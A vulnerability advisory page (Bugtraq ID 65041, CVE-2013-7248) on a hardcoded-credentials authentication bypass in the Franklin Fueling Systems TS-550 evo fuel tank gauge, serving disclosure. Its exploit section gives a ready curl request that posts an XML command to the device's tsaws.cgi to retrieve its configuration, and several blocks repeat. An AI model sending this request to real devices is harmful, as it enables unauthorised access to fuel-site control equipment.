Franklin Fueling Systems TS-550 evo 'tsaws.cgi' Hardcoded Credentials Security Bypass Vulnerability
BID:65041
Info
Franklin Fueling Systems TS-550 evo 'tsaws.cgi' Hardcoded Credentials Security Bypass Vulnerability
| Bugtraq ID: | 65041 |
| Class: | Access Validation Error |
| CVE: |
CVE-2013-7248 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 03 2014 12:00AM |
| Updated: | Mar 19 2015 08:34AM |
| Credit: | Nate Drier and Matt Jakubowski of TrustWave SpiderLabs |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Franklin Fueling Systems TS-550 evo 'tsaws.cgi' Hardcoded Credentials Security Bypass Vulnerability
Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device.
Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected.
Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device.
Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected.
Exploit / POC
Franklin Fueling Systems TS-550 evo 'tsaws.cgi' Hardcoded Credentials Security Bypass Vulnerability
An attacker can use readily available tools to exploit this issue
The following example request is available:
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi
An attacker can use readily available tools to exploit this issue
The following example request is available:
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi